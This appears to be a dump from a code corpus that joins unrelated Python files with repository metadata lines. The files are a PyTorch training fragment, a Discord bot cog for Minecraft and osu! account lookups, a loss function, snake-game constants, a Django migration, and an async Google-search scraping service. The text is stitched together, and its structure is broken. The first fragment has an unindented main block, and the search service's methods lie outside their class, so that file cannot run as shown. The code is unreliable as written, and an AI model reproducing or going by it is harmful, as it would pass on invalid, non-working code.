        criterion = torch.nn.CrossEntropyLoss().cuda()
        accs = list()
        for epoch in epochs:
            for inputs, targets in dataset:
                inputs = inputs.cuda()
                targets = targets.cuda()
                optimizer.zero_grad()
                outputs = model(inputs)
                loss = criterion(outputs, targets)
                loss.backward()
                optimizer.step()
                accs.append(accuracy(outputs, targets)[0].item())
            # accs holds top-1 accuracy percentages, so label the log
            # line accordingly (it previously said "Loss").
            print(f"Epoch {epoch} | Acc {np.mean(accs)}")
            # at every epoch, evaluate low_rank metrics for autoHyper
            metrics.evaluate()
        return metrics
    # indicate which hyper-parameters to optimize
    hyper_parameters = HyperParameters(lr=True, weight_decay=True)
    final_hp = optimize(epoch_trainer=epoch_trainer,
                        hyper_parameters=hyper_parameters)
    final_hyper_parameters_dict = final_hp.final()
    # do your final training with the optimized hyper-parameters
    epoch_trainer(final_hyper_parameters_dict, epochs=range(250))
def accuracy(outputs, targets, topk=(1,)):
    """Compute top-k accuracy percentages for a batch of predictions.

    Args:
        outputs: (batch, classes) score tensor.
        targets: (batch,) ground-truth class index tensor.
        topk: iterable of k values to evaluate.

    Returns:
        A list with one single-element tensor (percentage) per k.
    """
    with torch.no_grad():
        k_max = max(topk)
        batch_size = targets.size(0)

        # Top-k predicted class indices, transposed to (k, batch).
        _, top_preds = outputs.topk(k_max, 1, True, True)
        top_preds = top_preds.t()
        hits = top_preds.eq(targets.contiguous().view(1, -1).expand_as(top_preds))

        percentages = []
        for k in topk:
            k_hits = hits[:k].contiguous().view(-1).float().sum(0, keepdim=True)
            percentages.append(k_hits.mul_(100.0 / batch_size))
        return percentages
if __name__ == "__main__":
logger = init_logger(Path('logs'))
main()
| 1.882813 | 2 |
cogs/game.py | DoggieLicc/InfoBot | 1 | 12769729 | from discord.ext import commands
from discord.ext.commands.cooldowns import BucketType
from mojang import MojangAPI as Mojang
from pyosu import OsuApi
import discord
import pyosu
from custom_funcs import embed_create, is_uuid4
def sync_minecraft(ctx, account):
    """Build a Discord embed describing a Minecraft account.

    Blocking (synchronous Mojang API calls) -- the caller runs it in an
    executor. ``account`` may be a username or a UUID4 string; failures
    produce a red error embed instead of raising.
    """
    try:
        # Accept either a raw UUID or a username (resolved to a UUID).
        if is_uuid4(account):
            uuid = account
        else:
            uuid = Mojang.get_uuid(account)
        profile = Mojang.get_profile(uuid)
        if not profile:
            return embed_create(ctx, title="Error!", description="Account not found!", color=0xeb4034)
        name_history = Mojang.get_name_history(uuid)
    except Exception:
        return embed_create(ctx, title="Error!", description="Can't lookup account! (API down?)", color=0xeb4034)
    past_names = [data['name'] for data in name_history if data['name'] != profile.name]
    embed = embed_create(ctx, title="Minecraft account info:")
    embed.set_thumbnail(url="https://cdn.discordapp.com/attachments/632730054396215299/825080584451391529/grass.png")
    embed.add_field(name="Current Username:", value=discord.utils.escape_markdown(profile.name), inline=False)
    embed.add_field(name="Profile UUID:", value=profile.id, inline=False)
    embed.add_field(name="Past Usernames:",
                    value=(discord.utils.escape_markdown(", ".join(past_names)) if past_names else "No past usernames"),
                    inline=False)
    embed.add_field(name="Skin:",
                    value=f"[Download Skin ({'Steve Type' if not profile.skin_model == 'slim' else 'Alex Type'})]({profile.skin_url})" if profile.skin_url else "No skin",
                    inline=False)
    embed.add_field(name="Is legacy account?:", value="Yes" if profile.is_legacy_profile else "No", inline=False)
    # Dream's UUID
    if profile.id == 'ec70bcaf702f4bb8b48d276fa52a780c':
        embed.set_thumbnail(
            url="https://media.discordapp.net/attachments/632730054396215299/827393984875855982/ForsenCD-emote.jpg")
    return embed
def mode_convert(mode):
    """Translate a user-supplied osu! gamemode alias into (mode id, name).

    Missing or unrecognised aliases fall back to the standard mode
    ``(0, "")``. Matching is case-insensitive.
    """
    if not mode:
        return 0, ""
    alias = mode.lower()
    if alias in ("taiko", "t", "osu!taiko", "1"):
        return 1, "taiko"
    if alias in ("c", "catch", "ctb", "osu!catch", "2"):
        return 2, "catch"
    if alias in ("m", "mania", "osu!mania", "3"):
        return 3, "mania"
    # Standard-mode aliases and anything unknown both map to standard.
    return 0, ""
# Cog bundling game-account lookup commands (Minecraft, osu!).
# No class docstring on purpose: discord.py would surface it as the
# cog's help description, changing user-visible output.
class GameCog(commands.Cog, name="Game Info"):
    def __init__(self, bot):
        # osu! API client authenticated with the key from bot secrets.
        self.osu_api = OsuApi(bot.secrets["OSU_API_KEY"])
        self.bot = bot
        print("GameCog init")
    @commands.cooldown(1, 5, BucketType.user)
    @commands.command(aliases=["mc"])
    async def minecraft(self, ctx, account):
        """Gets info of minecraft accounts using current username or their UUID"""
        async with ctx.channel.typing():
            # Mojang calls are blocking; run them in an executor so the
            # event loop is not stalled.
            embed = await self.bot.loop.run_in_executor(None, sync_minecraft, ctx, account)
        await ctx.send(embed=embed)
    @commands.cooldown(1, 5, BucketType.user)
    @commands.command(aliases=["osu!"])
    async def osu(self, ctx, account, gamemode=None):
        """Gets info of osu! accounts! You can also specify"""
        async with ctx.channel.typing():
            # Resolve the optional gamemode alias to an API mode id.
            mode_int, mode_name = mode_convert(gamemode)
            osu_obj = await self.osu_api.get_user(user=account, mode=mode_int)
            if not isinstance(osu_obj, pyosu.models.User):
                embed = embed_create(ctx, title="Account not found!",
                                     description="If you are trying to get user info, use their username or user id.",
                                     color=0xeb4034)
            elif isinstance(osu_obj, pyosu.models.User):
                embed = embed_create(ctx, title=f"information for osu!{mode_name} account:")
                embed.set_thumbnail(
                    url="https://cdn.discordapp.com/attachments/632730054396215299/825081328146841600/osu.png")
                embed.add_field(name="General Info:",
                                value=f"Username: {osu_obj.username}\nUser ID: {osu_obj.user_id}\nLevel: {int(osu_obj.level)}\nCountry: {osu_obj.country}",
                                inline=False)
                embed.add_field(name="Ranking Info:",
                                value=f"PP Score: {int(osu_obj.pp_raw)}\nRanked Score: {int(osu_obj.ranked_score)}\nTotal Score: {int(osu_obj.total_score)}\nPP Rank: {osu_obj.pp_rank}th\nCountry PP Rank: {osu_obj.pp_country_rank}th",
                                inline=False)
                embed.add_field(name="Play Info:",
                                value=f"Accuracy: {int(osu_obj.accuracy)}%\n{osu_obj.playcount} (good) beatmaps played!\nAmount of SSH ranks: {osu_obj.count_rank_ssh}\nAmount of SS ranks: {osu_obj.count_rank_ss}\nAmount of SH ranks: {osu_obj.count_rank_sh}\nAmount of S ranks: {osu_obj.count_rank_s}\nAmount of A ranks: {osu_obj.count_rank_a}")
        await ctx.send(embed=embed)
def setup(bot):
    """Extension entry point used by discord.py's loader."""
    cog = GameCog(bot)
    bot.add_cog(cog)
| 2.359375 | 2 |
pygenome/fitness/loss.py | jorgetavares/pygenome | 1 | 12769730 | <reponame>jorgetavares/pygenome
import numpy as np
def mean_squared_error(x, y):
    '''
    Mean Squared Error (MSE)

    Args:
        x (array): array of predictions
        y (array): array of labels

    Returns:
        the mean squared error, mean((x - y)^2)
    '''
    # BUG FIX: np.sqrt(np.square(d)) is just |d|, so the old expression
    # returned the *summed absolute* error, not the MSE promised by the
    # name and docstring. np.asarray also accepts plain Python sequences.
    x = np.asarray(x)
    y = np.asarray(y)
    return np.mean(np.square(x - y))
| 3.125 | 3 |
globals.py | alexandrefresnais/Cobra | 1 | 12769731 | import math
# Nb grid square
GRID_WIDTH = 10    # number of grid cells horizontally
GRID_HEIGHT = 10   # number of grid cells vertically

# Absolute size of a grid square
GRIDSIZE = 20      # pixels per cell

# Size of window
SCREEN_WIDTH = GRID_WIDTH * GRIDSIZE
SCREEN_HEIGHT = GRID_HEIGHT * GRIDSIZE

# Unit direction vectors as (dx, dy); y grows downwards in screen coordinates.
UP = (0, -1)
DOWN = (0, 1)
LEFT = (-1, 0)
RIGHT = (1, 0)
# Returns true if a and b have same signs
def same_sign(a, b):
    """True when a and b are both > 0 or both <= 0 (zero counts as non-positive)."""
    return not ((a > 0) ^ (b > 0))
# Important : clockwise
# The clockwise ordering lets the get_local_* helpers rotate by an index offset.
directions = [UP, RIGHT, DOWN, LEFT]
# Get local right direction from our current direction
def get_local_right(direction):
    """Direction 90 degrees clockwise of `direction`."""
    idx = directions.index(direction)
    return directions[(idx + 1) % 4]
def get_local_down(direction):
    """Direction opposite (180 degrees from) `direction`."""
    idx = directions.index(direction)
    return directions[(idx + 2) % 4]
def get_local_left(direction):
    """Direction 90 degrees counter-clockwise of `direction`."""
    idx = directions.index(direction)
    return directions[(idx + 3) % 4]
# Return a + b with a and b being tuples
def add_tuple(a, b):
    """Return the element-wise sum of two 2-tuples.

    BUG FIX: the previous version created `res = (0, 0)` and then assigned
    into it (`res[0] = ...`), which raises TypeError because tuples are
    immutable — the function could never return successfully.
    """
    return (a[0] + b[0], a[1] + b[1])
# Pythagorian distance between two points
def distance(a, b):
    """Euclidean distance between 2-D points a and b."""
    dx = a[0] - b[0]
    dy = a[1] - b[1]
    return math.sqrt(dx ** 2 + dy ** 2)
video/migrations/0003_auto_20210427_1528.py | AxelConceicao/youtube-django | 1 | 12769732 | # Generated by Django 3.1.5 on 2021-04-27 15:28
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django's makemigrations; avoid hand-editing beyond comments.

    dependencies = [
        ('video', '0002_auto_20210427_1508'),
    ]

    operations = [
        # Re-declare Video.views with an explicit default of 0 and a display name.
        migrations.AlterField(
            model_name='video',
            name='views',
            field=models.IntegerField(default=0, verbose_name='Views count'),
        ),
    ]
| 1.507813 | 2 |
search_svc/search.py | mannyfin/aioget | 1 | 12769733 | import asyncio
from datetime import datetime
from itertools import combinations
import json
import glob
import os
import time
from typing import Optional, Tuple
import re
import sys
from aiohttp.client import ClientSession, TCPConnector
import redis
sys.path.append(os.path.dirname(os.path.abspath(__file__)) + "/..")
from configs.base.consts import CONFIG_DIR, ASYNC_SLEEP
from core import logger
from core import async_queue, filtration, async_write
from core.async_requests import AsyncHttpRequests
from core.utils import load_config, parse_consumer, make_config, pop_arb_field_if_exists, set_arb
from parser_scripts import google, googlenews
from sys import platform
# Use uvloop's faster event loop implementation where supported (not on Windows).
if platform != 'win32':
    import uvloop
    asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())

# Module-level logger that ships records to rabbit (see core.logger).
basiclogger = logger.rabbit_logger(__name__)

# todo or_combine_sites param -> lob searches -> measure perf impact
class SearchService(object):
    """
    The Search Service is a generic class that is used by any process in order to accept search inputs (e.g. search
    terms, keywords, sites, etc.), perform searches, and pass the results to another service. The Search Service
    implements a search query generator + async http requests + webpage Data Parser (google or googlenews) + async
    write to write outputs to a file.
    """

    # Config locations are resolved at class-definition time relative to CONFIG_DIR.
    SEARCH_SERVICE_CONFIG_PATH = os.path.normpath(os.path.join(CONFIG_DIR, 'service', 'search.json'))  # Proxy info, search sites, etc.
    BUSINESS_CONFIGS_DIR = os.path.normpath(os.path.join(CONFIG_DIR, 'business_drivers', 'search'))  # NegMedia/SJA/LOB/etc
    CLIENT_CONFIGS_DIR = os.path.normpath(os.path.join(CONFIG_DIR, 'client'))
    # Concrete JSON file lists; rescanned later by update_configs().
    BUSINESS_CONFIGS_PATHS = glob.glob(os.path.join(BUSINESS_CONFIGS_DIR, '*.json'))
    CLIENT_CONFIGS_PATHS = glob.glob(os.path.join(CLIENT_CONFIGS_DIR, '*', '*.json'))
def __init__(self, input_queue: asyncio.Queue, publish_queue: asyncio.Queue):
    """
    Args:
        input_queue: queue of inbound search-request messages (dict, or JSON bytes).
        publish_queue: queue onto which one message per extracted result URL is placed.
    """
    self.service_configs = load_config(self.SEARCH_SERVICE_CONFIG_PATH)
    self.business_configs = make_config(self.BUSINESS_CONFIGS_PATHS)
    self.client_configs = make_config(self.CLIENT_CONFIGS_PATHS)
    # todo pass in only the required params
    self.async_http_requests = AsyncHttpRequests(**self.service_configs)
    self.input_queue = input_queue
    self.publish_queue = publish_queue
    # Timestamp of the last config load; update_configs() re-reads after an hour.
    self.config_refresh = time.time()
    ##################3
    # self.service_configs['redis_db_params']['host'] = 'localhost'
    # Redis store used to de-duplicate recent searches (entity|language|function keys).
    self.search_history = redis.Redis(**self.service_configs['redis_db_params'])
def start(self):
    """
    Starts the Search Service by creating a worker daemons for each number of TCP connections for the desired
    concurrency. After a worker completes a url request, it sends the response to a webpage parser, which extracts
    the urls. Finally, the extracted urls are individually placed on messages for another service.

    Issues are saved in an audit file for review

    Returns:
        workers, queues, session
    """
    # use an intermediate queue here to limit number of messages waiting in the service.
    query_queue = async_queue.get_queue(maxsize=200)
    parse_queue = async_queue.get_queue()
    write_queue = async_queue.get_queue()
    # async with ClientSession(connector=TCPConnector(limit=self.async_http_requests.connections, ssl=False)) as \
    #         session:
    # The session is created without a context manager so it can outlive this method;
    # the caller is responsible for closing it.
    session = ClientSession(connector=TCPConnector(limit=self.async_http_requests.connections, ssl=False))
    workers = []
    # NOTE(review): indentation was lost in this copy of the file — it is possible
    # the parse/write consumers were created once *outside* this loop rather than
    # once per connection; confirm the nesting against version control.
    for _ in range(self.async_http_requests.connections):
        # Producer: turns inbound messages into search-query dicts.
        task = asyncio.create_task(self.put_onto_query_queue(query_queue))
        workers.append(task)
        # Request worker: fetches each query URL and forwards the response.
        task = asyncio.create_task(async_queue.worker(query_queue, parse_queue,
                                                      self.async_http_requests.handle_requests,
                                                      session=session,
                                                      ))
        workers.append(task)
        # Parser: extracts result URLs from fetched pages.
        task = asyncio.create_task(parse_consumer(next_queue=parse_queue, write_queue=write_queue,
                                                  ))
        workers.append(task)
        # Writer: records history/audit info and publishes per-URL messages.
        task = asyncio.create_task(
            self.write_consumer(audit_path='audit.txt', write_queue=write_queue, publish_queue=self.publish_queue)
        )
        workers.append(task)
    queues = [self.input_queue, self.publish_queue, query_queue, parse_queue, write_queue]
    return workers, queues, session
async def put_onto_query_queue(self, query_queue: asyncio.Queue):
    """
    Takes a message off of the input queue. Extracts the query and the service/business/client configuration and
    places it on the query queue

    Args:
        query_queue: destination queue of per-search query dicts.

    Returns:
        Never returns; runs as a long-lived consumer task.
    """
    # NOTE(review): indentation was lost in this copy; nesting below is the
    # natural reconstruction — confirm against version control.
    while True:
        await asyncio.sleep(ASYNC_SLEEP)
        while self.input_queue.qsize():
            try:
                # Back off while the downstream queue is at capacity.
                if query_queue.full():
                    await asyncio.sleep(ASYNC_SLEEP)
                    continue
                # if self.input_queue.qsize():
                message: dict = await self.input_queue.get()
                # Messages may arrive as raw JSON bytes off the wire.
                if isinstance(message, bytes):
                    message = json.loads(message)
                basiclogger.info(message)
                entity, business_configuration, client_search_configs = self.make_configuration(message)
                query_params = self._assign_query_gen_inputs(entity, business_configuration, client_search_configs)
                # Arbitrary passthrough fields are detached, then re-attached per query.
                arb_fields, message = pop_arb_field_if_exists(message)
                parse = google.parse if 'google' == business_configuration['service'] else googlenews.parse
                # construct query from message fields and configs
                for query in self._query_gen(business_configuration, **query_params):
                    query['parse_func'] = parse
                    query['client'] = message['client']
                    query['business_function'] = message['business_function']
                    # add any arb fields.
                    query = set_arb(msg=query, arb=arb_fields)
                    # Skip entity/language/function combos searched within the refresh period.
                    if filtration.filter_entities_redis(entity, query['language'], message['business_function'],
                                                        self.business_configs['search'][message['business_function']]['refresh_period'],
                                                        self.search_history):
                        await query_queue.put(query)
                    else:
                        basiclogger.info(f"entity combo searched recently: {entity}|"
                                         f"{query['language']}|{message['business_function']}")
            except Exception as exc:
                # Best-effort consumer: log and keep draining the queue.
                basiclogger.error(exc.__repr__())
            self.input_queue.task_done()
            await asyncio.sleep(ASYNC_SLEEP)
async def write_consumer(self, audit_path: str,
                         write_queue: asyncio.Queue,
                         publish_queue: Optional[asyncio.Queue]):
    """
    used by the Search Service only right now.

    .. todo:: this could be refactored by async_queue.worker

    Args:
        audit_path: path to audit file
        publish_queue: optional queue for per-URL downstream messages
        write_queue: asyncio.Queue where each queue item is a list of asyncio.Futures for parsing the responses

    Returns:
        Never returns; runs as a long-lived consumer task.
    """
    # NOTE(review): indentation was lost in this copy; nesting below is the
    # natural reconstruction — confirm against version control.
    while True:
        await asyncio.sleep(ASYNC_SLEEP)
        futures = []
        # Drain everything currently queued into a local batch.
        for ctr in range(write_queue.qsize()):
            futures.append(write_queue.get_nowait())
            write_queue.task_done()
        while futures:
            for _ in asyncio.as_completed(futures):
                parsed_output = await _
                # await async_write.write_data(output_path, f"{'|'.join(parsed_output['parsed_output'])}\n", 'a',
                #                              encoding=None)
                # Normalized entity key used in the redis search-history record.
                regexp_entity = re.sub('\W+', '', parsed_output['entity']).upper()
                # popping any arb field so it doesn't get saved in the search history
                arb_field, parsed_output = pop_arb_field_if_exists(parsed_output)
                self.search_history.set(f"{regexp_entity}|{parsed_output['language']}|{parsed_output['business_function']}", json.dumps(parsed_output))
                if publish_queue and parsed_output:
                    try:
                        # if no articles were found with the search, don't publish a message.
                        if 'urls' in parsed_output and 'cache_urls' in parsed_output:
                            for url, cache_url in zip(parsed_output['urls'], parsed_output['cache_urls']):
                                # check if url or cache_url is garbage
                                keep_url = filtration.filter_garbage_url_search_result(url,
                                                                                       self.business_configs['search'][
                                                                                           parsed_output[
                                                                                               'business_function']][
                                                                                           'url_filter_exclusion_patterns'])
                                keep_cache_url = True  # default if no cache_url present
                                if cache_url:
                                    keep_cache_url = filtration.filter_garbage_url_search_result(
                                        cache_url, self.business_configs['search'][parsed_output['business_function']]['url_filter_exclusion_patterns']
                                    )
                                if keep_url and keep_cache_url:
                                    # One downstream message per surviving result URL.
                                    msg = {'url': url,
                                           'cache_url': cache_url,
                                           'client': parsed_output['client'],
                                           'business_function': parsed_output['business_function'],
                                           'date': parsed_output['date'],
                                           'language': parsed_output['language'],
                                           'entity': parsed_output['entity']
                                           }
                                    if arb_field:
                                        msg = set_arb(msg=msg, arb=arb_field)
                                    await publish_queue.put(msg)
                        else:
                            basiclogger.debug(f"No results found for: {parsed_output}")
                    except Exception as exc:
                        basiclogger.error(exc.__repr__())
                        basiclogger.info(f'error_parsed_output: {parsed_output}')
                    # Record any parser-reported problem for later review.
                    if 'error' in parsed_output and parsed_output['error']:
                        await async_write.write_data(audit_path, f"{parsed_output['error']}\n", 'a',
                                                     encoding=None)
            # Keep waiting on any futures that have not completed yet.
            if futures:
                futures = [i for i in futures if not i.done()]
def _query_gen(self, business_configuration, **kwargs) -> dict:
    """
    Builds a query for Google search. Wraps the entity and the keyword in double quotes. Calls other helper
    functions for query creation.

    - Uses the language class attribute to incorporate language specific component to url.
    - The html encoded entities are created using the entities instance attribute called with
      the `_encode_make_phrase` method.
    - Combines all the keywords with quotes, spaces, and OR if applicable according to or_combine_kw instance
      attribute and calling _encode_keyword_combos method
    - Creates `site:website` if websites provided as website
      instance attribute, and combines with OR if applicable and calling _encode_site_search method
    - Creates date to-from string if date range provided as the date_range instance attribute and calling
      `_encode_date_ranges` method
    - Creates keywords_excluded string if they were provided in keywords_excluded
      instance attribute and calling _encode_keywords_excluded method.

    Args: entities (list): Entities list if user wanted to override self.entities

    Returns:
        Generator of dicts of (entity, query, cache_url, retries)

    Examples:
        Input:
            service = 'google'
            entities = ["<NAME>"]
            keywords = {'es': ["crime","launder"]}
            or_combine_kw = True
            date_range=['w']
            keywords_exclusion = ['yahoo.com']
            websites = ['bloomberg.com']
            language = 'es'
        Output:
            Resulting URL:
                https://www.google.com/search?safe=strict&q="<NAME>" AND ("crime" OR "launder") site:bloomberg.com
                -yahoo.com&hl=es-419&gl=US&ceid=US:es-419&tbs=qdr:w
            Resulting URL (encoded):
                'https://www.google.com/search?safe=strict&q=%22Joe+Black%22+AND+%28%22crime%22+OR+%22launder%22%29+site
                %3Abloomberg.com%20-yahoo.com&hl=es-419&gl=US&ceid=US:es-419+&tbs=qdr%3Aw'
    """
    # NOTE(review): indentation was lost in this copy; nesting below is the
    # natural reconstruction — confirm against version control.
    entities = kwargs['entity']
    # quote = '"'
    quote = '%22'   # URL-encoded double quote
    # space = '%20'
    space = '+'     # URL-encoded space
    # self.encoded_excluded_kw = self._encode_keywords_excluded()
    for language in kwargs['language']:
        start_url, host_lang = self._get_start_url_host_lang(language, business_configuration)
        encoded_excluded_kw = self._encode_keywords_excluded(kwargs['keywords_excluded'][language])
        if not kwargs['or_combine_kw']:
            # One query per (entity, keyword, site, date-range) combination.
            for entity in entities:
                for keyword in self._encode_keyword_combos(kwargs['keywords'][language]):
                    # todo could also replace US with MX, CL or other spanish speaking country.
                    #  Need to assess results though
                    for web in self._encode_site_search(kwargs['websites'], kwargs['or_combine_websites']):
                        for dates in self._encode_date_ranges([kwargs['date_range']]):
                            space2 = '' if not web and not dates else '+'
                            if len(keyword[1].split(' ')) == 1:
                                # search for "ENTITY" keyword_one_word
                                yield {'entity': entity,
                                       'url': f"{start_url}{self._encode_make_phrase(entity, space)}{quote}"
                                              f"{keyword[1].replace(' ', '+')}{quote}{space}{web}{space}"
                                              f"{encoded_excluded_kw}{host_lang}{space2}{dates}".strip('+'),
                                       'cache_url': '',
                                       'retries': 0,
                                       'response_encoding': None,
                                       'language': language,
                                       'proxy_account': business_configuration['proxy_account']
                                       }
                            else:
                                # search for "ENTITY" "keyword with multiple words"
                                yield {'entity': entity,
                                       'url': f"{start_url}{self._encode_make_phrase(entity, space)}"
                                              f"{keyword[0].replace(' ', '+')}{space}{web}{encoded_excluded_kw}"
                                              f"{host_lang}{space2}{dates}".strip('+'),
                                       'cache_url': '',
                                       'retries': 0,
                                       'response_encoding': None,
                                       'language': language,
                                       'proxy_account': business_configuration['proxy_account']
                                       }
        else:
            # All keywords OR-combined into one phrase -> one query per (entity, site, date-range).
            # TODO refactor this
            open_parens = '%28'
            close_parens = '%29'
            # for language in self.language:
            start_url, host_lang = self._get_start_url_host_lang(language, business_configuration)
            OR_keywords = '("' + '" OR "'.join(map(str, kwargs['keywords'][language])) + '")'
            # apply html encodings
            OR_keywords = OR_keywords.replace(' ', '+')\
                .replace('(', open_parens)\
                .replace(')', close_parens)\
                .replace('"', quote)
            # OR_keywords = OR_keywords.replace(' ', '+')
            # OR_keywords = OR_keywords.replace('(', open_parens)
            # OR_keywords = OR_keywords.replace(')', close_parens)
            # OR_keywords = OR_keywords.replace('"', quote)
            for entity in entities:
                for web in self._encode_site_search(kwargs['websites'], kwargs['or_combine_websites']):
                    for dates in self._encode_date_ranges([kwargs['date_range']]):
                        space2 = '' if not web and not dates else '+'
                        yield {'entity': entity,
                               'url': f"{start_url}{self._encode_make_phrase(entity, space)}AND{space}"
                                      f"{OR_keywords}{space}{web}{encoded_excluded_kw}{host_lang}{space2}"
                                      f"{dates}".strip('+'),
                               'cache_url': '',
                               'retries': 0,
                               'response_encoding': None,
                               'language': language,
                               'proxy_account': business_configuration['proxy_account']
                               }
def update_configs(self):
    """Reload service/business/client configs from disk, at most once per hour."""
    # todo this should be outside the class or in a base class
    # todo replace this with push notification
    now = time.time()
    # Guard clause: skip unless more than an hour has passed since the last load.
    if now - self.config_refresh <= 3600:
        return
    # Check if there are new configs
    # todo potential breakage if there are same outermost keys in the config files
    self.BUSINESS_CONFIGS_PATHS = glob.glob(os.path.join(self.BUSINESS_CONFIGS_DIR, '*.json'))
    self.CLIENT_CONFIGS_PATHS = glob.glob(os.path.join(self.CLIENT_CONFIGS_DIR, '*', '*.json'))
    self.service_configs = load_config(self.SEARCH_SERVICE_CONFIG_PATH)
    self.business_configs = make_config(self.BUSINESS_CONFIGS_PATHS)
    self.client_configs = make_config(self.CLIENT_CONFIGS_PATHS)
    self.async_http_requests = AsyncHttpRequests(**self.service_configs)
    self.config_refresh = time.time()
    basiclogger.info('search service configs updated')
def check_configs(self, business_function, client):
    """Resolve (business_function, client) to entries that exist in the configs.

    Unknown values trigger a one-shot config reload; anything still unknown
    falls back to the 'media' business function and the 'default' client.
    """
    unknown = (business_function not in self.business_configs['search']
               or client not in self.client_configs[business_function])
    if unknown:
        self.update_configs()
    if business_function not in self.business_configs['search']:
        # todo for now default to negative media
        business_function = 'media'
    if client not in self.client_configs[business_function]:
        client = 'default'
    return business_function, client
def make_configuration(self, message):
    """
    Extract configuration for a specific search

    Args:
        message (dict): JSON response message containing instructions on how to do a search

    Returns:
        (entity, business_configuration, client_search_configs)
    """
    # todo this should be outside the class?
    entity = message['entity']
    client = message.get('client', '')
    business_function = message['business_function']
    # check that client/business function exist in the configs. If not update. If still not, then provide a default
    business_function, client = self.check_configs(business_function, client)
    return (entity,
            self.business_configs['search'][business_function],
            self.client_configs[business_function][client])
def _assign_query_gen_inputs(self, entity, business_configuration, client_search_configs):
    """Merge client-level overrides over business defaults into the kwargs for _query_gen."""

    def pick(key):
        # Client-level value wins; fall back to the business default only when absent.
        if key in client_search_configs:
            return client_search_configs[key]
        return business_configuration[key]

    keywords: dict = pick('keywords')
    # Default language set: whatever languages the keyword table defines.
    language: list = (client_search_configs['language'] if 'language' in client_search_configs
                      else list(keywords.keys()))
    # todo add date_range if passed as an arb message parameter
    query_params = {'entity': [entity],
                    'keywords': keywords,
                    'language': language,
                    'websites': pick('websites'),
                    'or_combine_kw': pick('or_combine_kw'),
                    'or_combine_websites': pick('or_combine_websites'),
                    'keywords_excluded': pick('keywords_excluded'),
                    'date_range': pick('date_range')}
    self._type_checking(**query_params)
    return query_params
def _get_start_url_host_lang(self, language: str, business_configuration) -> Tuple[str, str]:
    """
    Read service configs to obtain the start_url and host_lang parameters

    Args:
        language (str): language for the search

    Returns:
        start_url (str): start_url for the TLD
        host_lang (str): language and geolocation-specific encoding applied to the url
    """
    service = business_configuration['service']
    options = self.service_configs['service_option'][service][language]
    return options['start_url'], options['host_lang']
@staticmethod
def _encode_make_phrase(words: str, space: str):
    """
    Helper function. Wraps *words* in URL-encoded double quotes (%22) and appends
    *space* after the closing quote. Spaces inside *words* become '+' and '&'
    becomes '%26'.

    Args:
        words (str): Word to make phrase with
        space (str): string appended after the closing quote

    Returns:
        '' when *words* is empty/None, otherwise the encoded quoted phrase.
    """
    if not words:
        return ''
    encoded = words.replace(' ', '+').replace('&', '%26')
    return '%22{0}%22{1}'.format(encoded, space)
@staticmethod
def _encode_site_search(websites: list, or_combine_websites: bool):
    """
    Adds site:http://www.website.com to Google search. If website == 'None', then default case is to NOT include
    site:example.com. This is useful if a search would like to search specific sites as well as not.
    Ex. `site:xyz.com` for one search and not including this string in another search.

    Yields:
        'site%3Awebsite.com' terms (individually, or one OR-combined term) if
        websites were supplied, otherwise a single empty string.
    """
    colon = '%3A'
    # default case, no websites
    if websites is None or len(websites) == 0:
        yield ''  # '%20'
        # BUG FIX: without this return the generator fell through to the loops
        # below on the next iteration — raising TypeError for websites=None and
        # yielding a bogus bare 'site%3A' term for websites=[] with or_combine.
        return
    if not or_combine_websites:
        # One yield per website; the literal string 'None' acts as an opt-out entry.
        for website in websites:
            if website and not (website == 'None'):
                yield 'site' + colon + website
            else:
                yield ''  # '%20'
    else:
        if len(websites) == 1:
            yield 'site' + colon + websites[0]
        else:
            # Single OR-combined term covering every site.
            yield 'site' + colon + '%20OR%20site%3A'.join(map(str, websites))
@staticmethod
def _encode_keywords_excluded(keywords_excluded):
    """
    Generate string of filter keywords. This is to remove those keywords from search results.
    This is akin to typing: -excluded_kw1 -excluded_kw2 etc. In the search bar.

    Returns:
        string

    Examples:
        Input:
            keywords_excluded = ['a', 'b', 'c']
        Output:
            '%20-a%20-b%20-c'
    """
    # None or empty -> no exclusion term at all.
    if not keywords_excluded:
        return ''  # '%20'
    return ''.join('%20-' + kw for kw in keywords_excluded)
@staticmethod
def _encode_date_ranges(date_range: list):
    """
    Filter search results by date. Takes date_range list and parses the info inside and creates the string to be
    added to the query.

    Possible options for the element inside the date_range list are:

    - "anytime" or "a"
    - "hour" or "h" (past hour)
    - "day" or "d" (past day)
    - "week" or "w" (past week)
    - "month" or "m" (past month)
    - "year" or "y" (past year)
    - mm/dd/yyyy,mm/dd/yyyy (between two dates with earliest first)
        * The code handles the case where the two dates are out of order.
        * The delimeter between the two dates can be one of ',- ' (comma, hyphen or space)

    Yields:
        string with the HTML encoded date ('' when the entry is empty or unparsable)
    """
    # %3A is a colon :
    pre_string = '&tbs=qdr%3A'
    for date_entry in date_range:
        if (date_entry is None) or (not date_entry) or (isinstance(date_entry, list) and len(date_entry) == 0):
            yield ''
        elif date_entry == 'anytime' or date_entry == 'a':
            yield '&tbas=0'
        elif date_entry == 'hour' or date_entry == 'h':
            yield pre_string + 'h'
        elif date_entry == 'day' or date_entry == 'd':
            yield pre_string + 'd'
        elif date_entry == 'week' or date_entry == 'w':
            yield pre_string + 'w'
        elif date_entry == 'month' or date_entry == 'm':
            yield pre_string + 'm'
        elif date_entry == 'year' or date_entry == 'y':
            yield pre_string + 'y'
        else:
            try:
                # if any, and find separator
                if ',' in date_entry:
                    date1, date2 = date_entry.split(',')
                elif ' ' in date_entry:
                    date1, date2 = date_entry.split(' ')
                else:
                    date1, date2 = date_entry.split('-')
                date1_check = datetime.strptime(date1, '%m/%d/%Y')
                date2_check = datetime.strptime(date2, '%m/%d/%Y')
                # check that dates are in order of min date , max date
                if date2_check < date1_check:
                    date1, date2 = date2, date1
                # BUG FIX: str.replace returns a new string (strings are
                # immutable); the results were previously discarded, so the
                # emitted range still contained raw '/' characters.
                date1 = date1.replace('/', '%2F')
                date2 = date2.replace('/', '%2F')
                yield '&tbs=cdr%3A1%2Ccd_min%3A' + date1 + '%2Ccd_max%3A' + date2
            except Exception as exc:
                basiclogger.info(exc)
                # if all else fails, yield ''
                yield ''  # '%20'
@staticmethod
def _encode_keyword_combos(keywords: list, degree: int = 1):
    """
    Generates tuples for combinations of keywords. See here for more information on how the degree works:
    https://en.wikipedia.org/wiki/Binomial_coefficient Most times we want to use degree=1. However, for research
    purposes we may want to test out different keyword combinations.

    Args:
        keywords (list): list of keywords. If provided from config file, provide self.keywords[language] to get
            the list
        degree (int): Degree of combinations (the k in n_choose_k from Probability & Statistics)

    Returns:
